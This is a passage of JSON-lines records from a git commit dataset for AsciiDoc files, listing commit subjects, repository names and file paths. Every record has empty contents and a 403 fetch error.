/elasticsearch,MjAbuz\/elasticsearch,andrestc\/elasticsearch,sc0ttkclark\/elasticsearch,rmuir\/elasticsearch,robin13\/elasticsearch,vingupta3\/elasticsearch,TonyChai24\/ESSource,MaineC\/elasticsearch,Brijeshrpatel9\/elasticsearch,YosuaMichael\/elasticsearch,lightslife\/elasticsearch,Helen-Zhao\/elasticsearch,wittyameta\/elasticsearch,martinstuga\/elasticsearch,bestwpw\/elasticsearch,onegambler\/elasticsearch,strapdata\/elassandra-test,drewr\/elasticsearch,bestwpw\/elasticsearch,kunallimaye\/elasticsearch,masterweb121\/elasticsearch,nilabhsagar\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra5-rc,AndreKR\/elasticsearch,Ansh90\/elasticsearch,franklanganke\/elasticsearch,cnfire\/elasticsearch-1,NBSW\/elasticsearch,mbrukman\/elasticsearch,zeroctu\/elasticsearch,scorpionvicky\/elasticsearch,xingguang2013\/elasticsearch,EasonYi\/elasticsearch,onegambler\/elasticsearch,18098924759\/elasticsearch,yanjunh\/elasticsearch,wenpos\/elasticsearch,sposam\/elasticsearch,Widen\/elasticsearch,mjhennig\/elasticsearch,strapdata\/elassandra5-rc,EasonYi\/elasticsearch,likaiwalkman\/elasticsearch,yongminxia\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,HarishAtGitHub\/elasticsearch,hafkensite\/elasticsearch,artnowo\/elasticsearch,dpursehouse\/elasticsearch,Liziyao\/elasticsearch,Brijeshrpatel9\/elasticsearch,umeshdangat\/elasticsearch,Widen\/elasticsearch,mjhennig\/elasticsearch,i-am-Nathan\/elasticsearch,episerver\/elasticsearch,episerver\/elasticsearch,wayeast\/elasticsearch,IanvsPoplicola\/elasticsearch,kimimj\/elasticsearch,iacdingping\/elasticsearch,adrianbk\/elasticsearch,jchampion\/elasticsearch,liweinan0423\/elasticsearch,xingguang2013\/elasticsearch,karthikjaps\/elasticsearch,achow\/elasticsearch,myelin\/elasticsearch,hirdesh2008\/elasticsearch,jchampion\/elasticsearch,abibell\/elasticsearch,yanjunh\/elasticsearch,nrkkalyan\/elasticsearch,HonzaKral\/elasticsearch,himanshuag\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,myelin\/elasticsearch,Collaborne\/elasticsearch,rhoml\/elasticsearch,dataduke\/elasticsearch,robin13\/elasticsearch,cwurm\/elasticsearch,fekaputra\/elasticsearch,scorpionvicky\/elasticsearch,pranavraman\/elasticsearch,mortonsykes\/elasticsearch,davidvgalbraith\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,mm0\/elasticsearch,acchen97\/elasticsearch,yongminxia\/elasticsearch,robin13\/elasticsearch,MichaelLiZhou\/elasticsearch,sarwarbhuiyan\/elasticsearch,palecur\/elasticsearch,rento19962\/elasticsearch,luiseduardohdbackup\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,TonyChai24\/ESSource,coding0011\/elasticsearch,markharwood\/elasticsearch,kingaj\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,truemped\/elasticsearch,tebriel\/elasticsearch,iantruslove\/elasticsearch,Siddartha07\/elasticsearch,masaruh\/elasticsearch,mbrukman\/elasticsearch,truemped\/elasticsearch,hydro2k\/elasticsearch,onegambler\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,franklanganke\/elasticsearch,jimczi\/elasticsearch,luiseduardohdbackup\/elasticsearch,fernandozhu\/elasticsearch,kenshin233\/elasticsearch,ckclark\/elasticsearch,TonyChai24\/ESSource,KimTaehee\/elasticsearch,kingaj\/elasticsearch,adrianbk\/elasticsearch,mcku\/elasticsearch,nezirus\/elasticsearch,dylan8902\/elasticsearch,myelin\/elasticsearch,liweinan0423\/elasticsearch,jango2015\/elasticsearch,dylan8902\/elasticsearch,MaineC\/elasticsearch,xuzha\/elasticsearch,martinstuga\/elasticsearch,abibell\/elasticsearch,tahaemin\/elasticsearch,vingupta3\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,humandb\/elasticsearch,Chhunlong\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,masterweb121\/elasticsearch,MaineC\/elasticsearch,lzo\/elasticsearch-1,obourgain\/elasticsearch,rlugojr\/elasticsearch,humandb\/elasticsearch,AndreKR\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,Liziyao\/elasticsearch,MisterAndersen\/elasticsearch,wimvds\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,hirdesh2008\/elasticsearch,abibell\/elasticsearch,kalimatas\/elasticsearch,Ansh90\/elasticsearch,yynil\/elasticsearch,fforbeck\/elasticsearch,mgalushka\/elasticsearch,kingaj\/elasticsearch,mjhennig\/elasticsearch,C-Bish\/elasticsearch,lightslife\/elasticsearch,mjhennig\/elasticsearch,ulkas\/elasticsearch,mcku\/elasticsearch,jprante\/elasticsearch,hafkensite\/elasticsearch,nknize\/elasticsearch,EasonYi\/elasticsearch,lzo\/elasticsearch-1,sdauletau\/elasticsearch,slavau\/elasticsearch,Liziyao\/elasticsearch,yongminxia\/elasticsearch,rento19962\/elasticsearch,mikemccand\/elasticsearch,yanjunh\/elasticsearch,huanzhong\/elasticsearch,njlawton\/elasticsearch,nilabhsagar\/elasticsearch,petabytedata\/elasticsearch,ivansun1010\/elasticsearch,rento19962\/elasticsearch,mohit\/elasticsearch,springning\/elasticsearch,scottsom\/elasticsearch,ouyangkongtong\/elasticsearch,kimimj\/elasticsearch,mgalushka\/elasticsearch,mute\/elasticsearch,kevinkluge\/elasticsearch,kevinkluge\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,polyfractal\/elasticsearch,slavau\/elasticsearch,gingerwizard\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,AndreKR\/elasticsearch,JSCooke\/elasticsearch,sdauletau\/elasticsearch,gfyoung\/elasticsearch,mmaracic\/elasticsearch,yongminxia\/elasticsearch,yanjunh\/elasticsearch,davidvgalbraith\/elasticsearch,pablocastro\/elasticsearch,mapr\/elasticsearch,sc0ttkclark\/elasticsearch,caengcjd\/elasticsearch,drewr\/elasticsearch,sc0ttkclark\/elasticsearch,Rygbee\/elasticsearch,Siddartha07\/elasticsearch,mgalushka\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,rajanm\/elasticsearch,ricardocerq\/elasticsearch,btiernay\/elasticsearch,zkidkid\/elasticsearch,nomoa\/elasticsearch,mute\/elasticsearch,uschindler\/elasticsearch,kaneshin\/elasticsearch,jango2015\/elasticsearch,ESamir\/elasticsearch,myelin\/elasticsearch,sposam\/elasticsearch,MaineC\/elasticsearch,drewr\/elasticsearch,kalburgimanjunath\/elasticsearch,wimvds\/elasticsearch,Fsero\/elasticsearch,knight1128\/elasticsearch,Collaborne\/elasticsearch,likaiwalkman\/elasticsearch,MichaelLiZhou\/elasticsearch,linglaiyao1314\/elasticsearch,areek\/elasticsearch,caengcjd\/elasticsearch,tkssharma\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Liziyao\/elasticsearch,wbowling\/elasticsearch,alexshadow007\/elasticsearch,markllama\/elasticsearch,elancom\/elasticsearch,LewayneNaidoo\/elasticsearch,sarwarbhuiyan\/elasticsearch,zkidkid\/elasticsearch,lightslife\/elasticsearch,Stacey-Gammon\/elasticsearch,luiseduardohdbackup\/elasticsearch,a2lin\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mmaracic\/elasticsearch,palecur\/elasticsearch,tsohil\/elasticsearch,brandonkearby\/elasticsearch,ckclark\/elasticsearch,Liziyao\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,schonfeld\/elasticsearch,weipinghe\/elasticsearch,alexshadow007\/elasticsearch,pablocastro\/elasticsearch,pozhidaevak\/elasticsearch,Uiho\/elasticsearch,Shekharrajak\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,nellicus\/elasticsearch,awislowski\/elasticsearch,gmarz\/elasticsearch,NBSW\/elasticsearch,areek\/elasticsearch,gmarz\/elasticsearch,yynil\/elasticsearch,wuranbo\/elasticsearch,adrianbk\/elasticsearch,truemped\/elasticsearch,knight1128\/elasticsearch,coding0011\/elasticsearch,NBSW\/elasticsearch,mapr\/elasticsearch,amit-shar\/elasticsearch,hirdesh2008\/elasticsearch,umeshdangat\/elasticsearch,beiske\/elasticsearch,dylan8902\/elasticsearch,jimhooker2002\/elasticsearch,coding0011\/elasticsearch,elancom\/elasticsearch,elasticdog\/elasticsearch,Rygbee\/elasticsearch,mnylen\/elasticsearch,Charlesdong\/elasticsearch,rmuir\/elasticsearch,beiske\/elasticsearch,kalburgimanjunath\/elasticsearch,caengcjd\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,henakamaMSFT\/elasticsearch,nrkkalyan\/elasticsearch,wuranbo\/elasticsearch,queirozfcom\/elasticsearch,trangvh\/elasticsearch,dataduke\/elasticsearch,s1monw\/elasticsearch,slavau\/elasticsearch,kcompher\/elasticsearch,yongminxia\/elasticsearch,lks21c\/elasticsearch,nrkkalyan\/elasticsearch,qwerty4030\/elasticsearch,KimTaehee\/elasticsearch,MjAbuz\/elasticsearch,smflorentino\/elasticsearch,likaiwalkman\/elasticsearch,ckclark\/elasticsearch,infusionsoft\/elasticsearch,camilojd\/elasticsearch,likaiwalkman\/elasticsearch,KimTaehee\/elasticsearch,btiernay\/elasticsearch,Chhunlong\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,fekaputra\/elasticsearch,trangvh\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,vroyer\/elasticassandra,18098924759\/elasticsearch,dpursehouse\/elasticsearch,ricardocerq\/elasticsearch,PhaedrusTheGreek\/elasticsearch,achow\/elasticsearch,lydonchandra\/elasticsearch,Collaborne\/elasticsearch,cnfire\/elasticsearch-1,wangtuo\/elasticsearch,huanzhong\/elasticsearch,snikch\/elasticsearch,strapdata\/elassandra,elancom\/elasticsearch,humandb\/elasticsearch,andrejserafim\/elasticsearch,hafkensite\/elasticsearch,iamjakob\/elasticsearch,Uiho\/elasticsearch,kalburgimanjunath\/elasticsearch,jpountz\/elasticsearch,amit-shar\/elasticsearch,nazarewk\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,jeteve\/elasticsearch,kaneshin\/elasticsearch,amit-shar\/elasticsearch,Brijeshrpatel9\/elasticsearch,mmaracic\/elasticsearch,F0lha\/elasticsearch,himanshuag\/elasticsearch,apepper\/elasticsearch,onegambler\/elasticsearch,vietlq\/elasticsearch,brandonkearby\/elasticsearch,iamjakob\/elasticsearch,maddin2016\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Rygbee\/elasticsearch,markllama\/elasticsearch,markwalkom\/elasticsearch,pritishppai\/elasticsearch,tsohil\/elasticsearch,petabytedata\/elasticsearch,mbrukman\/elasticsearch,lmtwga\/elasticsearch,elasticdog\/elasticsearch,Liziyao\/elasticsearch,himanshuag\/elasticsearch,Shekharrajak\/elasticsearch,karthikjaps\/elasticsearch,onegambler\/elasticsearch,truemped\/elasticsearch,HarishAtGitHub\/elasticsearch,PhaedrusTheGreek\/elasticsearch,adrianbk\/elasticsearch,JSCooke\/elasticsearch,pritishppai\/elasticsearch,scorpionvicky\/elasticsearch,areek\/elasticsearch,jimczi\/elasticsearch,nrkkalyan\/elasticsearch,zhiqinghuang\/elasticsearch,vingupta3\/elasticsearch,shreejay\/elasticsearch,dylan8902\/elasticsearch,jimhooker2002\/elasticsearch,rajanm\/elasticsearch,Rygbee\/elasticsearch,karthikjaps\/elasticsearch,sc0ttkclark\/elasticsearch,elasticdog\/elasticsearch,mnylen\/elasticsearch,kimimj\/elasticsearch,maddin2016\/elasticsearch,smflorentino\/elasticsearch,ImpressTV\/elasticsearch,markharwood\/elasticsearch,nellicus\/elasticsearch,wbowling\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo","old_file":"docs\/reference\/setup\/repositories.asciidoc","new_file":"docs\/reference\/setup\/repositories.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30cd1762d16384d641f8ac87a220e2cb76cdd4fe","subject":"Add kotlin doc.","message":"Add kotlin doc.\n","repos":"diabolicallabs\/vertx-mongo-client,diabolicallabs\/vertx-mongo-client","old_file":"vertx-mongo-client\/src\/main\/asciidoc\/kotlin\/index.adoc","new_file":"vertx-mongo-client\/src\/main\/asciidoc\/kotlin\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diabolicallabs\/vertx-mongo-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"612d8e992f14fb15864e761ea03395f2b9d405a9","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093e040b3e329210a406e15929fc837eb69d0753","subject":"y2b create post Best Gaming Headset? (PC, PS4, XBOX ONE)","message":"y2b create post Best Gaming Headset? (PC, PS4, XBOX ONE)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-16-Best-Gaming-Headset-PC-PS4-XBOX-ONE.adoc","new_file":"_posts\/2014-08-16-Best-Gaming-Headset-PC-PS4-XBOX-ONE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0ebe8d855d1e969d28d838c3a90c0f2884e58d0","subject":"y2b create post The Nexus S Gets Android Ice Cream Sandwich (OFFICIAL)","message":"y2b create post The Nexus S Gets Android Ice Cream Sandwich (OFFICIAL)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-17-The-Nexus-S-Gets-Android-Ice-Cream-Sandwich-OFFICIAL.adoc","new_file":"_posts\/2011-12-17-The-Nexus-S-Gets-Android-Ice-Cream-Sandwich-OFFICIAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3bea3ee6be9f6f0376dfba8226c14a4ff8773df","subject":"Update 2017-05-28-Pythonic-Distance-Conversion.adoc","message":"Update 2017-05-28-Pythonic-Distance-Conversion.adoc","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-05-28-Pythonic-Distance-Conversion.adoc","new_file":"_posts\/2017-05-28-Pythonic-Distance-Conversion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/daemotron\/daemotron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1096acacb771a0c9b80c6a6a1e67ec6fa9653759","subject":"Update 2017-04-03-Episode-94-Bit-Rot-and-Bug-Fixes.adoc","message":"Update 2017-04-03-Episode-94-Bit-Rot-and-Bug-Fixes.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-04-03-Episode-94-Bit-Rot-and-Bug-Fixes.adoc","new_file":"_posts\/2017-04-03-Episode-94-Bit-Rot-and-Bug-Fixes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a242fea545bb611b9cfeba49d510e3a1d943b8d","subject":"Update 2018-03-25-Blockchain-Design-considerations.adoc","message":"Update 2018-03-25-Blockchain-Design-considerations.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-25-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-03-25-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc5481517dbe84c34153f305ed330782ff7cf008","subject":"Update 2015-02-18-Source-repository-usage.adoc","message":"Update 2015-02-18-Source-repository-usage.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-18-Source-repository-usage.adoc","new_file":"_posts\/2015-02-18-Source-repository-usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"753c2aa6ed04f6ea25af48f78857495b82ab28a2","subject":"Update 2016-02-03-What-is-this-Blog-about.adoc","message":"Update 2016-02-03-What-is-this-Blog-about.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-03-What-is-this-Blog-about.adoc","new_file":"_posts\/2016-02-03-What-is-this-Blog-about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced465df7d561d040d0f148d1b6a5eb47a73fcb6","subject":"Update 2016-06-02-Walkin-Around-the-World.adoc","message":"Update 2016-06-02-Walkin-Around-the-World.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-06-02-Walkin-Around-the-World.adoc","new_file":"_posts\/2016-06-02-Walkin-Around-the-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b57eb8709d06ca8f83d0708d1989c53924779fd","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9f6ef8d85b620e0d2d2f3e286932df37764e492","subject":"Adjust bad table presentation","message":"Adjust bad table presentation\n","repos":"flogarcdos\/tiempoTrab,flogarcdos\/tiempoTrab","old_file":"src\/docs\/asciidoc\/manualTecnico\/manualArquitectura\/bloques-componentes.adoc","new_file":"src\/docs\/asciidoc\/manualTecnico\/manualArquitectura\/bloques-componentes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flogarcdos\/tiempoTrab.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53a7611570a71a9b4f3e5805719268e2d58caade","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d75d0395d2fe8f001eee6c46080f28c79e867b8","subject":"Included documentation for packaging","message":"Included documentation for packaging\n","repos":"mbrenn\/datenmeister-new,mbrenn\/datenmeister-new,mbrenn\/datenmeister-new,mbrenn\/datenmeister-new,mbrenn\/datenmeister-new","old_file":"docs\/development_packages.adoc","new_file":"docs\/development_packages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbrenn\/datenmeister-new.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36355c025d9878acb2f93adc05267ded08c40bf9","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-commons","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-commons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"070325e65ffab715956d5ba55d89f621f440d329","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"126b125e64323cb58f256b7245a6cdb7a8f817e8","subject":"Update 2017-06-11-jira-to-slack-notification.adoc","message":"Update 2017-06-11-jira-to-slack-notification.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-jira-to-slack-notification.adoc","new_file":"_posts\/2017-06-11-jira-to-slack-notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f44803e3852ec137b66352b97a9da183f5d99f12","subject":"Update 2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","message":"Update 2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","new_file":"_posts\/2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9528ec89c3eafc7f9f20ca1efe0180133520ab0","subject":"Update 2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","message":"Update 2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","new_file":"_posts\/2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be6cb60566fd469834a36fa4022f97eab73ed5d2","subject":"Create usecases.adoc","message":"Create usecases.adoc","repos":"identinetics\/saml2test2,rohe\/saml2test2,rohe\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,identinetics\/saml2test2","old_file":"doc\/usecases.adoc","new_file":"doc\/usecases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/identinetics\/saml2test2.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"173f69c976d1106a6524fc33829ee435a91a0a6c","subject":"Update 2015-12-25-Welcome-to-my-new-Blog.adoc","message":"Update 2015-12-25-Welcome-to-my-new-Blog.adoc","repos":"vuthaihoc\/vuthaihoc.github.io,vuthaihoc\/vuthaihoc.github.io,vuthaihoc\/vuthaihoc.github.io","old_file":"_posts\/2015-12-25-Welcome-to-my-new-Blog.adoc","new_file":"_posts\/2015-12-25-Welcome-to-my-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vuthaihoc\/vuthaihoc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c1bddc0f1dd82449421e1b6de1d743a1cdcde13","subject":"Update 2018-05-01-Shakespeare-be-my-love.adoc","message":"Update 2018-05-01-Shakespeare-be-my-love.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2018-05-01-Shakespeare-be-my-love.adoc","new_file":"_posts\/2018-05-01-Shakespeare-be-my-love.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a837d960edc0a9a64239efaa61fd2a5fc498341a","subject":"Add initial version of the release guide (building part).","message":"Add initial version of the release guide (building part).\n\nSigned-off-by: Gregor Zurowski <5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"christophd\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,nicolaferraro\/camel,cunningt\/camel,zregvart\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,pax95\/camel,DariusX\/camel,tdiesler\/camel,gnodet\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,DariusX\/camel,nikhilvibhav\/camel,Fabryprog\/camel,CodeSmell\/camel,objectiser\/camel,tdiesler\/camel,ullgren\/camel,mcollovati\/camel,tadayosi\/camel,zregvart\/camel,pmoerenhout\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,nicolaferraro\/camel,CodeSmell\/camel,pax95\/camel,alvinkwekel\/camel,Fabryprog\/camel,alvinkwekel\/camel,objectiser\/camel,davidkarlsen\/camel,tdiesler\/camel,cunningt\/camel,cunningt\/camel,gnodet\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,alvinkwekel\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,mcollovati\/camel,CodeSmell\/camel,pmoerenhout\/camel,zregvart\/camel,tdiesler\/camel,nikhilvibhav\/camel,christophd\/camel,gnodet\/camel,DariusX\/camel,ullgren\/camel,pmoerenhout\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,Fabryprog\/camel,davidkarlsen\/camel,tadayosi\/camel,CodeSmell\/camel,DariusX\/camel,adessaigne\/camel,ullgren\/camel,Fabryprog\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,objectiser\/camel,davidkarlsen\/camel,nicolaferraro\/camel,christophd\/camel,ullgren\/camel,apache\/camel,pax95\/camel,cunningt\/camel,apache\/camel,objectiser\/camel,tdiesler\/camel,cunningt\/camel,nikhilvibhav\/camel,zregvart\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c9cc3b565a38462bb799226b9d10ca5ee1d96d","subject":"Update 